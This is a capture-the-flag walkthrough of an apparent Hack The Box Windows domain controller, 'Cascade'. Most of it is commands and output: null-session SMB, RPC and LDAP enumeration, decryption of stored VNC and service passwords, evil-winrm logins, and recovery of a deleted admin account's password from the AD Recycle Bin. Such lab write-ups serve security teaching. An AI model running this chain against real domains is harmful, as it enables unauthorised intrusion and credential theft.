NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-25 15:37 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:37
Completed NSE at 15:37, 0.00s elapsed
Initiating NSE at 15:37
Completed NSE at 15:37, 0.00s elapsed
Initiating NSE at 15:37
Completed NSE at 15:37, 0.00s elapsed
Initiating Ping Scan at 15:37
Scanning 10.10.10.182 [4 ports]
Completed Ping Scan at 15:37, 0.66s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:37
Completed Parallel DNS resolution of 1 host. at 15:37, 0.36s elapsed
Initiating SYN Stealth Scan at 15:37
Scanning 10.10.10.182 [1000 ports]
Discovered open port 53/tcp on 10.10.10.182
Discovered open port 139/tcp on 10.10.10.182
Discovered open port 445/tcp on 10.10.10.182
Discovered open port 135/tcp on 10.10.10.182
Discovered open port 49157/tcp on 10.10.10.182
Discovered open port 49158/tcp on 10.10.10.182
Discovered open port 636/tcp on 10.10.10.182
Discovered open port 49165/tcp on 10.10.10.182
Discovered open port 3268/tcp on 10.10.10.182
Discovered open port 3269/tcp on 10.10.10.182
Discovered open port 389/tcp on 10.10.10.182
Discovered open port 49155/tcp on 10.10.10.182
Discovered open port 88/tcp on 10.10.10.182
Discovered open port 49154/tcp on 10.10.10.182
Completed SYN Stealth Scan at 15:38, 26.61s elapsed (1000 total ports)
Initiating Service scan at 15:38
Scanning 14 services on 10.10.10.182
Completed Service scan at 15:39, 60.12s elapsed (14 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.182
Retrying OS detection (try #2) against 10.10.10.182
Initiating Traceroute at 15:39
Completed Traceroute at 15:39, 0.43s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 15:39
Completed Parallel DNS resolution of 2 hosts. at 15:39, 0.40s elapsed
NSE: Script scanning 10.10.10.182.
Initiating NSE at 15:39
Completed NSE at 15:40, 40.10s elapsed
Initiating NSE at 15:40
Completed NSE at 15:42, 122.25s elapsed
Initiating NSE at 15:42
Completed NSE at 15:42, 0.00s elapsed
Nmap scan report for 10.10.10.182
Host is up (0.36s latency).
Not shown: 986 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-25 10:13:22Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.254 days (since Thu Jun 25 09:36:50 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 5m01s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-06-25T10:14:28
|_ start_date: 2020-06-25T04:12:26
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 411.99 ms 10.10.14.1
2 411.97 ms 10.10.10.182
NSE: Script Post-scanning.
Initiating NSE at 15:42
Completed NSE at 15:42, 0.00s elapsed
Initiating NSE at 15:42
Completed NSE at 15:42, 0.00s elapsed
Initiating NSE at 15:42
Completed NSE at 15:42, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 259.33 seconds
Raw packets sent: 2085 (95.424KB) | Rcvd: 71 (5.040KB)
ENUMERATION PART
SMB ANONYMOUS ENUMERATION LOGIN :
┌─[root@liquid]─[~/Desktop/HTB/cascadeC]
└──╼ #smbclient -L 10.10.10.182
Enter WORKGROUP\root's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available
RPCCLIENT ENUMEARTION NULL USER :
┌─[✗]─[root@liquid]─[~/Desktop/HTB/cascadeC]
└──╼ #rpcclient -U "" 10.10.10.182
Enter WORKGROUP\'s password:
rpcclient $> enum
enumalsgroups enumdomains enumdrivers enumkey enumprinters enumprocs
enumdata enumdomgroups enumforms enummonitors enumprivs enumtrust
enumdataex enumdomusers enumjobs enumports enumprocdatatypes
rpcclient $> enumdomains
name:[CASCADE] idx:[0x0]
name:[Builtin] idx:[0x0]
rpcclient $> enumdomusers
user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]
rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[DnsUpdateProxy] rid:[0x44f]
rpcclient $>
Here we got users and domains and groups
LDAP ENUMERAION :
nmap -p 389 –script ldap-* 10.10.10.182
┌─[✗]─[root@liquid]─[~/Desktop/HTB/cascadeC]
└──╼ #ldapsearch -h 10.10.10.182 -x -s sub -b "DC=cascade,DC=local"
# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ryan Thompson
sn: Thompson
givenName: Ryan
distinguishedName: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109193126.0Z
whenChanged: 20200323112031.0Z
displayName: Ryan Thompson
uSNCreated: 24610
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 295010
name: Ryan Thompson
objectGUID:: LfpD6qngUkupEy9bFXBBjA==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132247339091081169
lastLogoff: 0
lastLogon: 132247339125713230
pwdLastSet: 132230718862636251
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFVQQAAA==
accountExpires: 9223372036854775807
logonCount: 2
sAMAccountName: r.thompson
sAMAccountType: 805306368
userPrincipalName: r.thompson@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200126183918.0Z
dSCorePropagationData: 20200119174753.0Z
dSCorePropagationData: 20200119174719.0Z
dSCorePropagationData: 20200119174508.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132294360317419816
msDS-SupportedEncryptionTypes: 0
cascadeLegacyPwd: clk0bjVldmE=
here we have some password which is base64 encoded : clk0bjVldmE= :rY4n5eva
ENUMERATION AFTER LOGINS
Till now we have users and password for user RYAN :
I will try this password for smbclient and evil-winrm :
RYAN : SMBCLIENT
┌─[✗]─[root@liquid]─[~/Desktop/HTB/cascadeC]
└──╼ #smbclient -U "r.thompson" -L 10.10.10.182
Enter WORKGROUP\r.thompson's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Audit$ Disk
C$ Disk Default share
Data Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
print$ Disk Printer Drivers
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
┌─[root@liquid]─[~/Desktop/HTB/cascadeC]
└──╼ #
RYAN : EVIL-WINRM
┌─[✗]─[root@liquid]─[~/Desktop/HTB/cascadeC]
└──╼ #evil-winrm -u r.thompson -p rY4n5eva -i 10.10.10.182
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
So it failed for winrm but we will use smb and will try to get more data from smb
So we will download all files from folder DATA
┌─[✗]─[root@liquid]─[~/Desktop/HTB/cascade]
└──╼ #smbclient -U 'r.thompson' \\\\10.10.10.182\\Data
Enter WORKGROUP\r.thompson's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jan 27 08:57:34 2020
.. D 0 Mon Jan 27 08:57:34 2020
Contractors D 0 Mon Jan 13 07:15:11 2020
Finance D 0 Mon Jan 13 07:15:06 2020
IT D 0 Tue Jan 28 23:34:51 2020
Production D 0 Mon Jan 13 07:15:18 2020
Temps D 0 Mon Jan 13 07:15:15 2020
cd Co
13106687 blocks of size 4096. 7798117 blocks available
smb: \> cd IT
smb: \IT\> recurse ON
smb: \IT\> mget *
Get directory Email Archives? yes
Get file Meeting_Notes_June_2018.html? yes
getting file \IT\Email Archives\Meeting_Notes_June_2018.html of size 2522 as Meeting_Notes_June_2018.html (1.0 KiloBytes/sec) (average 1.0 KiloBytes/sec)
Get directory LogonAudit? yes
Get directory Logs? yes
Get directory Ark AD Recycle Bin? yes
Get file ArkAdRecycleBin.log? yes
getting file \IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log of size 1303 as ArkAdRecycleBin.log (0.6 KiloBytes/sec) (average 0.8 KiloBytes/sec)
yeGet directory DCs?yes
Get file dcdiag.log? yes
getting file \IT\Logs\DCs\dcdiag.log of size 5967 as dcdiag.log (2.8 KiloBytes/sec) (average 1.4 KiloBytes/sec)
yes
Get directory Temp? yesGet directory r.thompson?
yes
Get directory s.smith? yGet file VNC Install.reg? es
getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as VNC Install.reg (2.0 KiloBytes/sec) (average 1.5 KiloBytes/sec)
yes
Here we have downloaded all the files from this folder and for remaining folders we didnot had permission to access
So we have a HTML file named meeting in email archive which looks suspicious :
Next we have a .reg VNC file which have password in hex form which was found in smith directory :
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"DisconnectClients"=dword:00000001
"PollingInterval"=dword:000003e8
"AllowLoopback"=dword:00000000
"VideoRecognitionInterval"=dword:00000bb8
"GrabTransparentWindows"=dword:00000001
"SaveLogToAllUsersPath"=dword:00000000
"RunControlInterface"=dword:00000001
"IdleTimeout"=dword:00000000
"VideoClasses"=""
"VideoRects"=""
“Password”=hex:6b,cf,2a,4b,6e,5a,ca,0f
To decrypt this : https://github.com/frizb/PasswordDecrypts
smith : 6bcf2a4b6e5aca0f : sT333ve2
GETTING USER ACCESS
┌─[✗]─[root@liquid]─[~/Desktop/HTB/cascade]
└──╼ #evil-winrm -u s.smith -p sT333ve2 -i 10.10.10.182
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents> ls
*Evil-WinRM* PS C:\Users\s.smith\Documents> cd ..
*Evil-WinRM* PS C:\Users\s.smith> cd Desktop
*Evil-WinRM* PS C:\Users\s.smith\Desktop> dir
Directory: C:\Users\s.smith\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/25/2020 5:16 AM 34 user.txt
-a---- 3/25/2020 11:17 AM 1031 WinDirStat.lnk
*Evil-WinRM* PS C:\Users\s.smith\Desktop> type user.txt
ed6c4b7931a5cb041cc4c5090a1efdca
*Evil-WinRM* PS C:\Users\s.smith\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\s.smith\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
=============== ==============================================
cascade\s.smith S-1-5-21-3332504370-1206983947-1165150453-1107
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
CASCADE\Data Share Alias S-1-5-21-3332504370-1206983947-1165150453-1138 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\Audit Share Alias S-1-5-21-3332504370-1206983947-1165150453-1137 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\IT Alias S-1-5-21-3332504370-1206983947-1165150453-1113 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\Remote Management Users Alias S-1-5-21-3332504370-1206983947-1165150453-1126 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\s.smith\Desktop>
Here we have got user flag
Here we can see that we have these privs and group is builtin :
So lets check remaining files from smb :
So I checked a File named ArkADRecyclebin and here is what we got :
1/10/2018 15:43 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
1/10/2018 15:43 [MAIN_THREAD] Validating settings...
1/10/2018 15:43 [MAIN_THREAD] Error: Access is denied
1/10/2018 15:43 [MAIN_THREAD] Exiting with error code 5
2/10/2018 15:56 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
2/10/2018 15:56 [MAIN_THREAD] Validating settings...
2/10/2018 15:56 [MAIN_THREAD] Running as user CASCADE\ArkSvc
2/10/2018 15:56 [MAIN_THREAD] Moving object to AD recycle bin CN=Test,OU=Users,OU=UK,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD] Successfully moved object. New location CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD] Exiting with error code 0
8/12/2018 12:22 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
8/12/2018 12:22 [MAIN_THREAD] Validating settings...
8/12/2018 12:22 [MAIN_THREAD] Running as user CASCADE\ArkSvc
8/12/2018 12:22 [MAIN_THREAD] Moving object to AD recycle bin CN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local
8/12/2018 12:22 [MAIN_THREAD] Successfully moved object. New location CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
8/12/2018 12:22 [MAIN_THREAD] Exiting with error code 0
So their is user ArkSvc who is running AD :
Also from users we got from rpc we have user named arksvc so maybe we need to find password for this user
From AUDIT folder we have a sqlite3 file which has binary but if we run strings agaist this we can see text :
┌─[root@liquid]─[~/Desktop/HTB/cascade]
└──╼ #strings Audit.db
SQLite format 3
<---->
j.allenJoseph Allen
BackupSvcBackupSvc
d.burmanDavid Burman
b.hans
?dddddddd
DEL:f9bfa86b-d7ab-4561-b4b3-dbb1edb51f49CN=dddd\0ADEL:f9bfa86b-d7ab-4561-b4b3-dbb1edb51f49,CN=Deleted Objects,DC=cascade,DC=local
ITempAdminTempAdmin
DEL:5ea231a1-5bb4-4917-b07a-75a57f4c188aCN=TempAdmin\0ADEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a,CN=Deleted Objects,DC=cascade,DC=local
?tempTemp
DEL:83cb74b3-2958-45d0-90f0-72d46a4abddcCN=Temp\0ADEL:83cb74b3-2958-45d0-90f0-72d46a4abddc,CN=Deleted Objects,DC=cascade,DC=local
Mdeleteddeleted guy
DEL:8cfe6d14-caba-4ec0-9d3e-28468d12deefCN=deleted guy\0ADEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef,CN=Deleted Objects,DC=cascade,DC=local
?testTest
DEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6dCN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
='ArkSvcBQO5l5Kj9MdErXx6Q6AGOw==cascade.local
sqlb_temp_table_
DeletedUserAudit
Ldap
dddddddd
DEL:f9bfa86b-d7ab-45
dddddddd
<------>
Here we can see that we have text looks like hash So lets decode this :
Tp decode the above text : https://dotnetfiddle.net/G2eVVb
arksvc : BQO5l5Kj9MdErXx6Q6AGOw== : w3lc0meFr31nd
┌─[root@liquid]─[~/Desktop/HTB/cascade]
└──╼ #evil-winrm -u arksvc -p w3lc0meFr31nd -i 10.10.10.182
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\arksvc\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\arksvc\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
============== ==============================================
cascade\arksvc S-1-5-21-3332504370-1206983947-1165150453-1106
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
CASCADE\Data Share Alias S-1-5-21-3332504370-1206983947-1165150453-1138 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\IT Alias S-1-5-21-3332504370-1206983947-1165150453-1113 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\AD Recycle Bin Alias S-1-5-21-3332504370-1206983947-1165150453-1119 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\Remote Management Users Alias S-1-5-21-3332504370-1206983947-1165150453-1126 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Here we see that we have privilege to use AD recyclebin
So we can get deleted part of AD from recycle bin
smith and arksvc are have kindoff same privs but AD part is given only for arksvc !
So to recover this I have taken help of the following links :
Recycle Part of Active Directory :
*Evil-WinRM* PS C:\Users\arksvc\Desktop> Get-ADObject -ldapFilter:"(msDS-LastKnownRDN=*)" -IncludeDeletedObjects
Deleted : True
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
Name : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
ObjectClass : user
ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059
*Evil-WinRM* PS C:\Users\arksvc\Desktop> Get-ADObject -filter 'isdeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property *
<---->
uSNChanged : 196700
uSNCreated : 196690
whenChanged : 1/26/2020 2:40:52 AM
whenCreated : 1/26/2020 2:34:31 AM
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
CN : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage : 0
countryCode : 0
Created : 1/27/2020 3:23:08 AM
createTimeStamp : 1/27/2020 3:23:08 AM
Deleted : True
<---->
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz : baCT3r1aN00dles [BASE64 DECODED]
GETTING ADMINISTRATOR ACCESS
┌─[root@liquid]─[~/Desktop/HTB/cascade/Logs/Ark AD Recycle Bin]
└──╼ #evil-winrm -u administrator -p baCT3r1aN00dles -i 10.10.10.182
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cascade\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
CASC-DC1
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
08e7a535*****************82e075
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
Leave a Reply